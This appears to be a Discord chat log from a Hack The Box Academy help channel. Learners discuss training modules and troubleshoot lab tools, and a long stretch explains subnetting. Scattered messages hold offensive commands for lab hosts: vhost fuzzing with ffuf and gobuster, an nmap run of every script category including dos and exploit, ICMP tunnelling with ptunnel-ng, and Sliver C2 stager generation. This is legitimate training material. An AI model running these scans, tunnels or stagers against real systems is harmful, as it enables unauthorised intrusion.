if you want to remove one please keep the one in "Attacking Common Gateway Interface (CGI) Applications - Shellshock" I like it more

gray yacht
compact temple
#

Any support available? I'm doing the Skill Asssessment - Hard on Abusing HTTP Misconfigurations following the Solution walkthough, but the 'admin' is not triggering the exploit. Tried couple of resets already.

rustic sage
#

Why can't I log in on this page when I use another account that I created using a GraphQL query ?

coarse pine
#

but maybe you can still query the data for the new account via GraphQL

#

what is that

dusk holly
coarse pine
#

admit it

dusk holly
#

No

coarse pine
#

dude I quit learning

fathom pendant
dusk holly
iron yarrow
#

Hi, I need help. I'm doing the Broken Authentication Skills assessments module but I can't break the OTP.

half geyser
#

Question on modules in general from people who know more than me. I just got the annual plan which has the walkthrough, and it is tempting to use it. How long did you guys bang you head against the wall before using the walkthrough? I would rather it was just disabled, but I do NOT have the willpower to not look at it if I get really stuck 🙁

rose lagoon
#

hello I need help for the "Pass the Ticket (PtT) from Linux"

half geyser
half geyser
#

Sure

terse bloom
#

Hello guys, Attacking Enterprise Networks --> Lateral Movement. I cannot exploit the application for privesc. Whenever I set up the scheduled task and/or triggered task, it never executes bat files

mint topaz
fathom pendant
fathom pendant
terse bloom
fathom pendant
white vale
#

is this normal on HTB? am I expected to follow this type or rules reguarly ?

fathom pendant
#

You can bruteforce vhosts

#

ffuf -u http://ip:port -H "Host: FUZZ.do.main"
gobuster vhost http://do.main --domain "do.main"

white vale
#

Thanks. I'll check

turbid jewel
#

Anyone did the Attacking Thick Client Applications recently?

#

It should be that hard to make it? The windows machine feels too "heavy" it takes more than 5 minutes to open de x64dbg

vague cedar
#

hii guys, the website on XXE module is not loading, I've connected to VPN, i can ping it too, but cant open it in firefox or burp's chromium

#

could someone help pls

half geyser
terse bloom
fathom pendant
uncut slate
fathom pendant
#

@uncut slate don't reveal answers to module questions

uncut slate
#

Thank you. @fathom pendant
New, still getting used to behavioral stuff - what #-THREAD can I put this general question about the .exe ?

fathom pendant
uncut slate
#

That's fair, will keep in the format on the site. I'm more so noticing a pattern with this particular .exe - seens like a LOL type problem, but the file itself is not really a problem ( according to searches). Its a built-in.

fathom pendant
#

Commands often come with flags that indicate more than what meets the eye

turbid jewel
#

@fathom pendant I think this issue is there for a while, there is anyplace to report it?

#

Its the same for paths

fathom pendant
turbid jewel
#

It does not takes me to the right place

fathom pendant
#

Modules and paths are an element that should do a little drop-down element

turbid jewel
#

hmmmmmmmmmmmmmm

#

maybe some configuration

fathom pendant
#

Its working as intended on my machine

turbid jewel
#

from my browser blocking it

#

i'll check

coarse pine
#

also not working for me

#

you can write /modules on the URL

turbid jewel
#

yup

#

Its what i'm doing

#

just reported because is kinda weird

modest token
# modest token For the record, HTTP Misconfigurations - Skills Assessment - Hard cannot current...

The HTTP Misconfigurations - Skills Assessment - Hard is still broken. There are a few of us now that are stuck and cannot progress further until it has been fixed. There is an admin bot, who is supposed to visit a page we poison to promotes us so that we can access an admin panel. The bot is not working. I haven't gotten any response yet about this. Can someone please help me get in touch with anyone from support who can fix this for us?

fathom pendant
#

its not a direct link to the modules. Its a js element ¯_(ツ)_/¯

compact patrolBOT
fathom pendant
#

Htb support team aren't paid to monitor the discord

modest token
#

If contacting HTB support was that simple I wouldn't be writing here asking for help.

fathom pendant
faint hill
#

Happy New Year All!

I am slaving away at the CME skills assessment at the end of the module. Currently I am stuck at the 3rd question " Gain access to the DEV01 and submit the contents of the flag located in C:\Users\Administrator\Desktop\flag.txt. "

I have creds for ||sqlxxx+Axxl+jxxxtxx+Inxxxxx.|| Nowhere is there a ||writable share for responder shenanigans|| so getting the ||Jxxxx user|| to do something that might give something away that I want is proving something of a mystery. I've ransacked the DB|| (using regular SQL stuff not related to CME - that this was necessary strikes me as weird as this is a CME assessment and not an SQL assessment)|| and i am getting nothing.

Any hints here?

tranquil axle
final cypress
#

Hi guys. I'm currently in the introduction to networking module and wondered if someone could help me understand subnetting better.

fathom pendant
# final cypress Hi guys. I'm currently in the introduction to networking module and wondered if ...

an ipv4 address is split into 4 octets; 1.2.3.4 → subnetting splits a network into several smaller networks
10.10.0.0/8 → this splits the network into segments where each next 3rd octet indicates a new network
10.10.1.0 is on a different network from 10.10.2.0 etc. etc. 10.10.1.0/8 in the network means that it spans from 10.10.1.1 → 10.10.1.255
/16 splits the last 2 octets
/24 splits the last 3 each one giving exponentially more devices per division

#

it's given in a subnet mask 11111111.00000000.00000000.00000000 <- the /x represents the amount of 1s at the start of the mask, up to 31/32

#

the 0s represent the # of devices available on the network

#

my division was backwards

#

/24 < /16 < /8

#

my first example would be a /24 not a /8

jovial walrus
#

Just completed password attacks module
Looking to know other folks' thought process for the skills assessment. Feel free to dm

fathom pendant
final cypress
fathom pendant
#

32 ones means that it's the only device on the network

#

11111111.11111111.11111111.11111111

#

where are the other devices supposed to go?

#

😉

#

0s represent available devices in base2

jovial walrus
fathom pendant
#

so 1~.1~.1~.0~ represents 8 bits of devices that can be assigned to the network

#

(note that the max number per octet is 255

#

(the ~ is used so I don't break my finger typing out all the 1s/0s, that isn't standard notation)

glad flicker
#

you're used to counting with these "places":
1111:
1 1 1 1
thousands hundreds tens ones

But binary counts differently:
1111:
1 1 1 1
eights fours twos ones

so to count to eight in binary, if you have all four "places" as a zero:
0000
0001
0010
0011
0100
0101
0110
0111
1000

so, when you deal with IP addresses, you have eight "places" in each octet (octets are the parts separated by . )
They're called octets because they have eight places:
0 0 0 0 0 0 0 0
which is:
one-hundred-and-twenty-eights, sixty-fours, thirty-twos, sixteens, eights, fours, twos, ones

If all the places were 1 instead of zero, then it would be
128 + 64 + 32 + 16 + 8 + 4 + 2 + 1
Which = 255

so lets say you have:
0.0.0.0
this is a shorthand way of writing:
00000000.00000000.00000000.00000000

and 255.255.255.255 is a shorthand way of writing:
11111111.11111111.11111111.11111111

so subnets are defined by just saying "how many of those 32 0s are pre-filled with 1s" or "how many of those bits are free to be assigned as IPs for devices"

so let's take a typical home network:
IP of the router: 192.168.0.1
netmask: 255.255.255.0
subnet CIDR range: 192.168.0.0/24

The netmask says the first three octets (from the left) are occupied, but you have the final octet to play with:
111111111.11111111.11111111.00000000
the CIDR range tells you that the first 24 bits from the left are occupied - as you can see above; three groups of 8 ones. 3x8 = 24

so if the subnet was 192.168.0.1/16, the netmask would be:
255.255.0.0
Or:
11111111.11111111.00000000.00000000
Because only the first 16 places are occupied this time.

#

so with the home network, the 192.168.0.x will always be fixed, but the devices on it can be up to 255 on that final octet (x)

final cypress
#

I see

glad flicker
#

in my opinion, the best way to get your head around it is to understand how to count in binary, so that's why I started at that point.

final cypress
#

So then in binary, the submet mask of 10.200.20.0/27 would be
00001010.11001000.00010100.00000000? If I count in binary?

glad flicker
#

so the cidr number tells you the first 27 bits are occupied:
11111111.11111111.11111111.11100000

waxen totem
glad flicker
#

which would be 255.255.255.224

#

each octet [octet 1] . [octet 2] . [octet 3]** . **[octet 4]

Is a separate binary number with 8 places, from 0 to 255 each

#

it's tricky to get your head round at first but you'll get it.

fathom pendant
#

CIDR (Classless InterDomain Routing) fills the bits from left to right

#

/1 being 10000000.0~.0~.0~ to /32 1~.1~.1~.1~ each number sequentially adds a bit from the left

#

a subnet mask WILL not be mixed with 0s, it always starts with N 1's

glad flicker
#

you can test out different IPs, ranges etc and see what it looks like in the different formats

lime osprey
#

I really hate to bring up subnets again but im feeling stuck and could use some help, if someone wouldnt mind..
im working on the 'subnetting' section in the "intro to networking" module... I have successfully answered the first to questions (finding the subent mask and broadcast address of 10.200.20.0/27) the last two are asking for the network and broadcast address of additional subnets... ive broken down the next 3 blocks(?) (and double checked them with ip calulator) and for whatever reason my answers are incorrect.

Im assuming each block represents another subnet? or am i totally off bass here?
thanks yall

waxen totem
lime osprey
idle agate
#

in footpeinting lab-medium model ,when i mount the file on my computer,i can't open the mount file by primess defind,who can tell me how to slove this problem.

acoustic owl
idle agate
#

ok,it be sloved,thank you

white vale
#

that or if you guys had configure the server to handle 404 in a more convenient way...

brave field
#

why not go with -fs XXX instead?

devout lily
#

"NTLM is a single sign-on (SSO) solution that uses a challenge-response protocol to verify the user's identity without having them provide a password." Could this be an error? I know that only Kerberos is a SSO solutions thanks to the ticket

waxen totem
brave field
glass talon
#

Hi everyone, I’m new to HTB. I’m currently doing the Linux Fundamentals. When it says to install SELinux on my VM but I don’t have one, can I just do all the exercises in the provided VM?

waxen totem
glass talon
#

Thank you

coarse pine
#

who did that?!

fathom pendant
coarse pine
fathom pendant
#

don't care + it's irrelevant

coarse pine
#

it is called The Finger Family

spare kindle
#

Hi, I am new in HTB and working on "Web Requests" lab. I stuck at "CRUD API" and how I can get the field names of those API endpoints? Thanks.

coarse pine
fathom pendant
fathom pendant
coarse pine
fathom pendant
coarse pine
#

but here I feel home

#

because there is n00bs like me asking about things

fathom pendant
#

irrelevant conversations and such don't belong here

coarse pine
fathom pendant
#

now quit adding unnecessary stuff to the channel, and follow directions when asked

coarse pine
#

I don't understand why you blame me but it's okay thanks

fathom pendant
coarse pine
#

what did I do?

fathom pendant
#

making irrelevant comments and messages in chats where it's not wanted/needed

coarse pine
#

okay guys if someone here said that I bother him please tell me

#

let's see if I did something wrong

potent pier
#

If you want to yap go to general. It's that simple

coarse pine
fathom pendant
modest token
#

I'm just going to put this here for anyone who struggles with this in the future: in HTTP Misconfigurations - Skills Assessment - Hard the attack won't work unless you add httpattacks.htb to your host file. This is not explained in the module and should have been added to the module in a note, i.e: vHosts needed for this questions: httpattacks.htb .

rare condor
rare condor
# rare condor

I'm in the Initial Enumeration of the Domain module and the instance is very laggy and sometimes kicks me out of pwnbox ssh in the middle of the scan

#

I'm honestly afraid that the exam will be in such low-quality instances.

tender nimbus
#

Hey guys I'm doing the command line fundamentals and I'm stuck a tthis " Using the skills acquired in this and previous sections, access the target host and search for the file named 'waldo.txt'. Submit the flag found within the file. " I already tried differnt methodes, looked online but can't find it. I tried the where /R C:\ waldo.txt, i tried to search all .txt and doa findstr on waldo.txt but still nothing any idea?

final cypress
#

Hi again, I'm back. My problem may be similar to the one above. I am trying to use the command ssh to connect and I get a kickback as the authenticity of the host cannot be resolved. Am I inputting the command in wrong? I am typing it exactly as I see it.

final cypress
#

Assume the first part is redundant - ssh htb-student@10.129.191.162

tender nimbus
#

And from where are you doing IT? Pwnbox or your own vm?

final cypress
#

Pwnbox in the HTB Viewer

tender nimbus
#

Which module is it?

final cypress
#

Linux Fundmentals.

tender nimbus
#

Weird when you do ssh htb-student@<ip> what do you get?

#

@final cypress

tender nimbus
cloud urchin
#

@faint hill Please take care not to post content or spoilers from modules above tier 0

tender nimbus
#

In htb modules. The [] are what you have to write like [say a word] you input —> helloworld without the []

final cypress
#

Ah

tender nimbus
faint hill
final cypress
tender nimbus
#

Yes

cloud urchin
tender nimbus
#

@final cypress ok for you?

final cypress
#

I think I found the password.

uncut slate
#

Psheewwww... getting the hash in module module 216 section 2301 was a beast.

fathom pendant
#

it's best to say module and section name instead of numbers; the numbers are basically meaningless

cloud urchin
#

except for section 391 from module 611, who could forget that one

simple shuttle
#

I transcended into script kiddie now. I understand the concepts but not sure which exploit sticks, so I just run all the scripts and hope 1 sticks. Any beginners here?? I will assist.

nmap 10.129.2.49 --script auth,broadcast,brute,default,discovery,dos,exploit,external,fuzzer,intrusive,malware,safe,version,vuln

dark basin
#

The main thing I gotta say about any of the modules is that I'm happy with the diversity in subject matter and I'm excited to see what else HTB will offer in the future. My main goal for 2026 as far as HTB is concerned is to grind the modules and get as many challenges completed. 🦾

civic fiber
#

Anyone got openVPN connection issues?

#

Or just me?

valid spear
#

Is anyone familiar with the author of the "ADCS Attacks" module? I have a question about how one of the sections is presented

plush spear
#

help

#

im playing the meow and its just infinite pinging

#

it shouldnt take that long

cloud urchin
cloud urchin
#

@sour snow Please take care not to post content from modules abover tier 0

#

You can ask your question without posting screen shots that reveal info like that

hasty mauve
#

Module: Active Directory Trust Attacks
Section: Unconstrained Delegation Cross Forest

My question is, there are 3 requirements for the attack to work, but they did not cover anything about how to enumerate if these were met in the first place.
The two-way trust between domains can easily be enumerated, but how to enumerate whether the other two requirements are met?
i.e. TGT delegation allowed on the trust, and selective authentication is disabled.

Any help would be appreciated

hasty mauve
#

Also another question I have, why do I have to be on the DC of domain A to be able to abuse cross-forest unconstrained delegation?
Why for example SQL01 won't work? I didn't quite understand this part.
I'll review and try to understand but if anyone can just explain this to me it'll be great.

worn sun
#

something like Get-DomainTrust -Domain <domain>

heady sapphire
#

Is there a compiler binary for responder so that we can easily transfer it to compromised targets machines?

acoustic owl
hasty mauve
ocean bolt
#

Hello please is anyone of you completed tthe penetration testing Footprinting module?

hasty mauve
#

Tried that.

ocean bolt
#

I am stuck at the footprinting lab - Hard. Please is there any help.

heady sapphire
hasty mauve
#

Module: Active Directory Trust Attacks
Section: Unconstrained Delegation Cross Forest

Since the module did not explain anything regarding how to enumerate if the requirements are met or not, I tried to do so on my own.
I was able to come up with a PowerShell command that enumerates both the SelectiveAuthentication and TGT Delegation on the trust level.

When I tried the command on the lab, it says that neither are enabled.

PS C:\tools> Get-ADTrust -Filter * -Properties SelectiveAuthentication,TGTDelegation | Format-Table Source, Target, SelectiveAuthentication, TGTDelegation -AutoSize

Source                 Target                 SelectiveAuthentication TGTDelegation
------                 ------                 ----------------------- -------------
DC=inlanefreight,DC=ad logistics.ad                             False         False
DC=inlanefreight,DC=ad child.inlanefreight.ad                   False         False

Now for SelectiveAuthentication I understand why, and that it needs to be disabled for the attack to work.
But TGT delegation is required for the attack to work according to the module, and even though the output says it's disabled for logsitics.ad, the attack worked.
Can someone please explain what am I missing? or if the command is wrong?

worn sun
#

but someone else please confirm

#

the flag being false (tgtdelegation) shouldn't be your sign that the attack isn't going to work

#

i still didn't do the module but i remember one of the seasonal machines having a similar attack situation

covert schooner
#

Hi i am facing difficulty in setting up ODAT for the Oracle TNS section of footprinitng module.
There's always a dependency missing when i try to run it.
i have used all the commands given in the module for settinh up odat.

hasty mauve
#

Thanks for the answer.
Will try to confirm that.

dusk holly
#

i would say check forums on this module, there are a lot of hints there

flint palm
#

Hi Guys if there is someone here who has completed hacking wordpress please let me know

dusk holly
#

also ask your question directly here

uncut slate
acoustic owl
#

I don't think there's that much to study with Responder 🙂

uncut slate
#

What you mean, seems like a complex tool to me; or is this a "these are not the droids you're looking for".

acoustic owl
#

Responder is one of the most common tools used during an internal penetration test as a first attempt to get a foothold into a Windows network. The attack has also gained popularity among ransomware enterprises looking to compromise as many accounts as possible on Windows networks. Attack Overview The first attack relies on two prerequisites: […]

uncut slate
#

The description has tags for aleast 10 different key concepts: [#LLMNR, #NBT-NS, #MDNS, #HTTP, #SMB, #FTP, #MSSQL, #FTP, #LDAP, #NTLM, #NTLMSSP, etc.] - We should prob. move over to #general ?

Maybe, your approach to use is different, that's really what I'm curious about.

acoustic owl
uncut slate
#

In my case, it was so dang noisy though. I feel there is much more to learn and discuss on this, if you're interested.

gusty zinc
#

hi, in the sliver module (module 241 section 2637) - when i run stage-listener --url tcp://PWNIP:4443 --profile htb it attempts to compile forever and eventually fails entirely. This appears to be a known issue (see bug report below)

https://github.com/BishopFox/sliver/issues/2073

What would the recommendation be here? Previously I was using the prior version which, unforuntely, also had bugs that appeared to break functionality and the recommendation was to update.

GitHub

[*] Installing extension 'sa-nslookup' (v0.0.25) ... done! stacktrace from panic: goroutine 1 [running]: runtime/debug.Stack() runtime/debug/stack.go:24 +0x65 github.com/bishopfox/sliver/se...

uncut slate
#

Seems noisy to me, but maybe its relative to who is listening.
If you had to place a mark on your proficiency with the tool between 1 - 10, where are you with it, and how did you get there?

acoustic owl
gusty zinc
night wolf
#

Could anyone help me with Crackmapexec skills assessment Q3 please?

gusty zinc
#

now sure what this is

boreal kelp
gusty zinc
#

i must have posted the wrong link, this is the right spot

heady sapphire
#

Guys which terminal emulator would you recommend and why ? The most important I want it to do it to be able to split screen when I am in ssh session (keeping the session / ssh connection ) to both new created windows .

gusty zinc
#

Theres another issue in the same section of this module (241, 2637, Sliver) --> Generate stager no longer has --lhost syntax

boreal kelp
gusty zinc
#

ive tried old and new, currelty using [*] Client v1.6.0 - Compiled 2026-01-01 10:50:59

boreal kelp
#

Additionally, if you build on personal VM, I recommend you stick to tags/v1.5.42 but nuke the built-in amsi bypass before compiling. That thing is cancer and will light up MDAV like a christmas tree.

covert schooner
#

Anyone who has already setup ODAT. Need help in setting it up. Unable to configure it

gusty zinc
boreal kelp
gusty zinc
#

i think its more than that - theres services running for it

#

yep, client wont start, service also wont run

#

client likely wont connect and fails due to the service

uncut slate
gusty zinc
#

pulled down repos from github for that exact version cited in module - its broken

#

Connection to server failed context deadline exceeded

#

anyone able to help with sliver issues for the sliver module by chance? I'm not sure what else to do other than just skip the entire module

uncut slate
#

Did you figure it out?

gusty zinc
#

Theres another issue with the sliver module unfortunetly - this syntax and work flow is no longer valid nor present in the sliver framework

generate stager --lhost 10.10.14.244 --lport 4443 --format csharp --save staged.txt

#

what is the pathway to contact support for acadmey to see how I should proceed? This module doesnt appear to be functional

final cypress
#

If you want to find the name of a network inferface set at 1500, it's the ip command and what else? I found out the answer.

#

Question for intro to Linux OS

gusty zinc
#

thank you though

clever zenith
#

hello guys i've just launched the first skill assessment for windows privesc but i can't even ping the ip (vpn working as it should be )

#

weirdly that 've used the same vpn for the whole sections, do i need a specific vpn for the skill assessment

knotty granite
clever zenith
#

you mean region or the protocol ?

knotty granite
#

Both

clever zenith
#

i've tried to change region and protocol , i can't even ping i'm not sure why

covert schooner
#

Hi anyone who has a running ODAT tool. I am unable to set it up. Tried apt install , docker

#

I am using macbook m1

covert schooner
fathom pendant
# covert schooner

Run each install step independently instead of from the script, it often breaks

knotty granite
brittle vapor
#

I am in the Further Credential Theft part of the Windows Privilege Escalation module, and I am encountering an issue where I uploaded my own Lazagne.exe form the official repo, but when I run it it didn't find the credentials that it was supposed to.
However when I run the one in C:\tools\Lazagne.exe it does find the proper credentials ...
Is that something common?

uncut slate
#

Analyzing Evil With Sysmon & Event Logs module seems to need to be updated from MEDIUM to HARD?

cloud urchin
#

no?

uncut slate
#

No, why? @last walrus

#

Did you get any traction?

nova pivot
#

Hello there, just completed the Penetration Tester path, and I therefore have a few cubes stored. Does anyone have feedback regarding the Introduction to Windows Evasion one ?

native sundial
#

is this working or need to input another formet ?

mighty matrix
#

hi guys, haven't touched on htb in a minute.

#

😅

#

using pwnbox

jovial walrus
#

I need help on this

mighty matrix
#

okay changed it to http 👍

wide jungle
#

did anyone ever solved the clock skew error issue persisting with "ntpdig: no eligible servers"?

cloud urchin
#

try faketime; faketime "$(ntpdate -q $Target | awk '{print $1 " " $2}')" <cmd>

#

you could also just use ntpdate, sudo ntpdate DC_IP_ADDRESS

wide jungle
#

i did but the same output kept coming up

#

both ntpdate and faketime

cloud urchin
#

Try it from the pwnbox then

uncut slate
#

Sup

#

@zealous cloud What moduels you working on

zealous cloud
#

CDSA (SOC Analyst path)

#

i'm going for the cert

uncut slate
#

Think I'm doing the same.

zealous cloud
#

no mic?

uncut slate
#

@marsh sandal Audio check.

#

lol

fathom pendant
#

this is a reminder not to share solutions regarding tier 1 or higher modules if you're actively working on them in the vc

#

i don't wanna have to come in there to monitor

uncut slate
#

I think the issue is that i'm running discord inside a VM

#

Kernel issues?

zealous cloud
cloud urchin
#

@uncut slate This channel is for module talk, please take it to DM's

fathom pendant
#

@sudden spire what module are you streaming?

sudden spire
#

retired content

#

machine

fathom pendant
#

ah couldn't tell if it was a retired machine or academy beta in the preview

#

carry on

cold quartz
#

Could anyone give a nudge for the last question on Windows Lateral Movement Skills assessment.
What's the content of the flag located at DC C:\Users\Administrator\Desktop\flag.txt?

mighty matrix
#

why cant i connect im using pwnbox?

fair merlin
#

I set the LHOST, RHOSTS, and used the correct exploit, but still it does not work

#

It ran till the stager process, and then the server stopped

fair merlin
#

Yup, I followed the correct steps, still it does not work. When I reset the machine and retried the steps, now it says cant check exploitability

fair merlin
#

Figured it out, it was the firewall

noble sun
#

i need help, password attacks pass the certificate

#

this fixes it

#

for anyone who needs it

woven zenith
#

the labs from Web Attacks - IDOR are super slow, it takes forever to load

mint lodge
#

Hey all I'm at "Active Directory Enumeration & Attacks" module in the "LLMNR/NBT-NS Poisoning - from Linux" section. I can't quite get the first question.

What am I supposed to do this is a really confusing one for me.

I ran responder and connected via SSH to the target. Should the hash just appear in reponder? I looked at the solution and it says ||the hash should just appear after 5 minutes||.

hasty mauve
severe inlet
#

Hello guys i wanna ask a dumb question sorry

But how do you know if you fully understood a certian section so you can move on to the next?
Im afraid of doing a section or a whole module without fully understanding it and it will haunt me later on and i will probably forget it

fathom pendant
fathom pendant
#

If you want to dive deeper into a topic beyond whats presented thats on you

severe inlet
fathom pendant
severe inlet
#

Thank you so much MarcieLee

mint lodge
#

Hey all,
I'm on "Enumerating & Retrieving Password Policies" and I can't get ldapsearch to find the password policy. I am getting these errors: (I tried adding the IP to the /etc/hosts file)

└─$ ldapsearch -H 10.129.128.185 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength       
Could not parse LDAP URI(s)=10.129.128.185 (3)
                                                                                                                                                     
┌──(kali㉿kali)-[~/HTB-ACADEMY/Modules/ActiveDirectoryEnumerationAttacks]
└─$ ldapsearch -H ldap://10.129.128.185 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
ldap_sasl_bind(SIMPLE): Can't contact LDAP server (-1)

Anyone knows why its not working?

cloud urchin
#

i mean the error says can't connect to the server

#

so that's probably why it's not working

#

altohugh that command looks complex i don't recall doing that but i could just be forgetting

fallen trail
#

Hi, I am struggling with the skill assesstment of the Password attack module. I have every pass from every user, but I am unable to get the hash of the domain administrator and there is nothing else to do. nxc does not work for me, and I have reset everything many times, anyone could help?

vital zodiac
#

Anyone can help me in XPATH-Authentication ByPass?

mint lodge
mint lodge
cloud urchin
#

troubleshoot network issues

#

ie. can you ping the server etc

chilly tartan
cloud urchin
#

It says the referred user, not the person who referred them, gets 20 cubes after their first module completion

fathom pendant
#

up to

marble quiver
#

Need help at Skill Assessment - File Inclusions Module. I don't get the source code of the apply.php

sharp cedar
#

hi uhh i have a problem with windows fundamentals after a short time i always get kicket from the target server

[16:33:08:581] [9820:9821] [ERROR][com.winpr.timezone] - Unable to find a match for unix timezone: US/Central
[16:33:08:981] [9820:9821] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[16:33:08:981] [9820:9821] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[16:33:08:991] [9820:9821] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[16:33:08:991] [9820:9821] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[16:34:14:897] [9820:9821] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 110: Connection timed out
[16:34:14:897] [9820:9821] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[16:34:14:897] [9820:9821] [INFO][com.freerdp.client.common] - Network disconnect!

i tried my the browser mashine
from windows to windows and extern

.....

fathom pendant
#

connection timed out
That leads me to believe a connection problem

sharp cedar
#

it works thanks

sly mica
#

I need help with the Footprinting SMTP module.

fathom pendant
#

gimme a sec to pull up my notes; but you can reiterate your problem here from #1457170717027209247 since i'm closing that thread ❤️

#

i used smtp-user-enum script, not the msfconsole script

sly mica
#

smtp script gave me less usernames than msfconsole and none of them worked for the final question. smtp script have the same usernames as msfconsole but less of the,

#

look at my screenshot

fathom pendant
#

dm me with the hash of the wordlist you're using i'll see if I can replicate any info

#

also your screenshot contained some info related to some of the other questions; so I deleted the message

#

i was able to get the answer with the msfconsole script as well

sly mica
#

When I go to download it from the page. It downloads to my local machine, and idk how to transfer files into my htb machine, I'm sure they wouldnt allow that anyways for security purposes. SO. I realized I could try to open the browser inside of the parrotos VM. Then nav to the HTB login page. Login, Then download it inside of the vm. Well when that is tried. The Fullscreen OR the box iside of the htb page just glitches tremendously and is inoperatable. SO was forced to use msfconsole which gave me a pretty lengthy list of usernames.

fathom pendant
#

that's because of how the screen resolution is being pulled; it loads from the latest screen update, which would be the one you just navigated to, which would have a much lower resolution, which then prompts another screen update which is at a much lower size....

fathom pendant
#

@west yacht footprinting is a tier 2 module, please refrain from sharing scan outputs

#

make sure to run an nmap -p- scan there may be a port you missed; if that doesn't work reset the lab. It's relevant to the creds you were given in the overview of the lab

west yacht
sly mica
#

my fav discord channel is htb channel lol

west zodiac
#

Module:
Pivoting, Tunneling, and Port Forwarding > ICMP Tunneling with SOCKS

Pivot Terminal:
ubuntu@WEB01:~$ sudo ./ptunnel-ng -r10.129.202.64 -R22
[inf]: Starting ptunnel-ng 1.42.
[inf]: (c) 2004-2011 Daniel Stoedle, daniels@cs.uit.no
[inf]: (c) 2017-2019 Toni Uhlig, matzeton@googlemail.com
[inf]: Security features by Sebastien Raveau, sebastien.raveau@epita.fr
[inf]: Forwarding incoming ping packets over TCP.
[inf]: Ping proxy is listening in privileged mode.
[inf]: Dropping privileges now.
[inf]: Incoming tunnel request from 10.10.14.76.
[inf]: Starting new session to 10.129.202.64:22 with ID 58542
[inf]: Incoming tunnel request from 10.10.14.76.
[inf]: Starting new session to 10.129.202.64:22 with ID 43690
[inf]: Received session close from remote peer.
[inf]: Session statistics:
[inf]: I/O: 0.00/ 0.00 mb ICMP I/O/R: 8/ 6/ 0 Loss: 0.0%

My Terminal:
└─$ sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22
[inf]: Starting ptunnel-ng 1.42.
[inf]: (c) 2004-2011 Daniel Stoedle, daniels@cs.uit.no
[inf]: (c) 2017-2019 Toni Uhlig, matzeton@googlemail.com
[inf]: Security features by Sebastien Raveau, sebastien.raveau@epita.fr
[inf]: Relaying packets from incoming TCP streams.
[inf]: Incoming connection.
[evt]: No running proxy thread - starting it.
[inf]: Ping proxy is listening in privileged mode.
[inf]: Dropping privileges now.
[inf]: Incoming connection.
[inf]: Connection closed or lost.
[inf]: Session statistics:
[inf]: I/O: 0.00/ 0.00 mb ICMP I/O/R: 16/ 10/ 0 Loss: 0.0%

Then run this:
ssh -D 9050 -p2222 -lubuntu 127.0.0.1
ubuntu@127.0.0.1's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
Last login: Sun Jan 4 03:49:27 2026 from 10.129.202.64
ubuntu@WEB01:~$

#

Proxychains test:
└─$ proxychains nmap -sV -sT 172.... -p.....
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-04 08:54 PKT
Nmap scan report for 172......
Host is up (0.0014s latency).
PORT STATE SERVICE VERSION
..../tcp filtered ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 0.58 seconds

My Settings:
cat /etc/proxychains.conf
[ProxyList]
socks5 127.0.0.1 9050

ss -ltp | grep 2222
LISTEN 0 10 0.0.0.0:2222

ss -ltp | grep 9050
LISTEN 0 128 127.0.0.1:9050
LISTEN 0 128 [::1]:9050

Ive tried with -Pn and tried RDP as told but nothing worked confirming pivot is not happening.

#

It worked connection was the issue, it disconnected somehow and even with -Pn and proxychains nmap was showing filtered so i was kinda confused.
But right now i directly conected to RDP and it worked and used nc to check port open and it worked.

strange cobalt
#

Hi, Im working on "Introduction to Windows Evasion Techniques" on the static analysis section, and i'm confused when I check the log.txt, It says Ok ..., however the flag.txt is not showing up. Any tips on how to move on?

cloud urchin
#

that means you didn't follow the instructions precisely

#

re-read the section and ensure everything is how it's described in the section

midnight crescent
#

I need to finish this AD module

#

its taking me forever

worn sun
hollow ermine
#

Someone changed the password for the instance Skill Assessment of Module DACL 1 ?

dusk holly
hollow ermine
#

Resolved, it was me...lol. Thanks anyway

mighty matrix
#

Hi all, could someone please assist me with this question

#

am I doing it right or missing something? and if eveything is okay why isn't it showing me the exact dates of these events?

raw falcon
#

Hi ! Could someone help me with the command injection skill assesment, I got the flag but I don't know why me injection work correctly...

turbid jewel
#

Hi!

#

For the ones that did the Pivoting, Tunneling, and Port Forwarding

#

I do not cover ligolo, right?

#

Thinking in doing the CPTS mostly of the tools used there probably will not be used

#

Or i'm crazy?

worn sun
#

can't disclose information about the exam environment but definitely ligolo can replace most of the tools introduced in the module, generally speaking

hidden ledge
#

Always good to know how all the techniques works if you can't use your first choice tool for any reason

severe hinge
#

Hello, everyone! Did anyone have the same problem as me? I am stuck on Hacking Wordpress module, User Enumeration section. I need to give user with id 2. My curl results are different from examples so I can't use given techniques. I used CMSeek to enumerate users and got admin, david and roger. None of them are correct answers

hasty mauve
#

Module: Active Directory Trust Attacks
Section: Skills Assessment
Question: Gain access to the DC03 (Apexcargo.ad) and submit the contents of the flag located in "C:\Users\Administrator\Desktop\flag.txt"

I'm %100 I'm doing it right but it's not working, tried resetting the lab, tried going for a break and coming back, but for some reason the attack is not working.
Can I DM someone for this please?

fathom pendant
# mighty matrix

The visualization looks like it could be running as a 'week of' instead of per day

fallen zodiac
#

Hello. Anyone faced this issue? Im stuck on Introduction to bash scripting, "Create a "For" loop that encodes the variable "var" 28 times in "base64". The number of characters in the 28th hash is the value that must be assigned to the "salt" variable. ". My result is *** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
bad decrypt
40D79FC6637E0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:124:
or after adding -pbkdf2
salt:26152 and an empty "flag: "

fathom pendant
coarse pine
